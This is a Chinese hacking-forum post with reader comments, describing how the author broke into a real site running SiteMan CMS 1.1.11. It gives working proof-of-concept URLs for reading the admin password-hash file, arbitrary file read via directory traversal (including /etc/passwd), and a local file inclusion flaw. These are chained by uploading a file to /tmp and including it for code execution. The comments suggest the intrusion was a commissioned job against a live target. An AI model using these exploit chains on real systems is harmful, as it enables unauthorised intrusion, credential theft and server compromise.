SiteMan Cms 漏洞&利用技巧分享

  • A+
所属分类:WooYun-Zone

昨天在搞目标时 发现有个分站使用了siteman cms 就下了套源码看了下

SiteMan Cms 漏洞&利用技巧分享

SITEMAN CMS 是一套国外广泛使用的程序 采用PHP编写 ,TXT做数据库

TXT来做数据库的安全性肯定高不鸟哪里去,可是国外就是很多人使用.

测试环境 :Linux+apache+php+mysql siteman 1.1.11

SITEMAN CMS 远程密码HASH读取:

http://XXX.COM//data/members.txt

SiteMan Cms 漏洞&利用技巧分享

密码用MD5加密  

SiteMan Cms 漏洞&利用技巧分享

解密进入后台

http://xxx.com/admin.php

一般情况下后台能够上传任意文件的

http://xxx.com/admin.php?do=edfiles

SiteMan Cms 漏洞&利用技巧分享

这服务器做了目录限制 apache权限无法生成文件 管理方都是通过FTP操作文件的

在无奈之时发现了一个任意文件读取漏洞

http://XXX.com/admin.php?do=edtxt&file=../../../../../../../etc/passwd

SiteMan Cms 漏洞&利用技巧分享

SiteMan Cms 漏洞&利用技巧分享

鸡肋啊

再次无奈之时 发现代码有好玩的东西

Index.php

第4行左右

  if (isset($_GET["page"])) {

    if (substr($_GET["page"],0,1) != ".") {

      $page = $_GET["page"];

    }

    else {

      $page = "index";

    }

  }

  else {

    $page = "index";

  }

第40行左右

$content = "pages/" . $page . ".php";

第96行左右

  include_once($content);

不解释 你们都懂的

本地包含漏洞

这就好办了 既然网站的目所有录都没权限  TMP目录肯定有权限

SiteMan Cms 漏洞&利用技巧分享

利用../上传文件到任意目录

用任意文件读取漏洞看下是否上传成功

SiteMan Cms 漏洞&利用技巧分享

已经成功上传 然后就爆菊了

http://XXX.COM/index.php?do=default&page=/../../../../../../../tmp/2

注意 包含时不用.php了

第40行左右

$content = "pages/" . $page . ".php";

SiteMan Cms 漏洞&利用技巧分享

总结:

1:Siteman 管理员密码hash读取漏洞

POC:http://XXX.COM/data/members.txt

2:任意文件读取漏洞

POC:http;//XXX.COM/admin.php?do=edtxt&file=../admin.php

3:本地包含漏洞

POC:http://XXX.COM/index.php?do=default&page=XXX

4:上传不到时请别忘记尝试TMP临时目录再利用包含

SiteMan Cms 漏洞&利用技巧分享

  1. 1#

    hqdvista (…) | 2013-01-05 21:34

    lz看来是gov的

  2. 2#

    数据流 | 2013-01-05 22:02

    @hqdvista 虽说我不是 但是你怎么猜出来的“说对了一半“

  3. 3#

    Fate (NIXI Team 欢迎志同道合的朋友交流.) | 2013-01-05 22:12

    @数据流 哪一半。。。。

  4. 4#

    hqdvista (…) | 2013-01-06 01:15

    @数据流 那就是接了gov的单子的了。。。因为lz发的网站里面有很不河蟹的8*8内容,所以感觉应该是gov下的单子让搞的

  5. 5#

    liner (/\) | 2013-01-06 01:28

    这个是张学良部流出来的单子,哈尔滨方面搞的

  6. 6#

    liner (/\) | 2013-01-06 01:29

  7. 7#

    数据流 | 2013-01-06 09:06

    擦 我发错了 暴露了目标

  8. 8#

    数据流 | 2013-01-06 09:07

    @liner 擦擦擦 我居然不小心把目标发出来了!!!!

  9. 9#

    数据流 | 2013-01-06 09:52

    感谢 谁帮我把帖子的敏感信息删了 感谢 哈哈 @xsser

  10. 10#

    半世倾尘 | 2013-01-06 12:42

    学习了  代码我看不懂 怎么办

  11. 11#

    晴天小铸 | 2013-01-13 16:52

    又做单子。

  12. 12#

    小贱人 (资深菜鸟) | 2014-05-16 16:19

    mark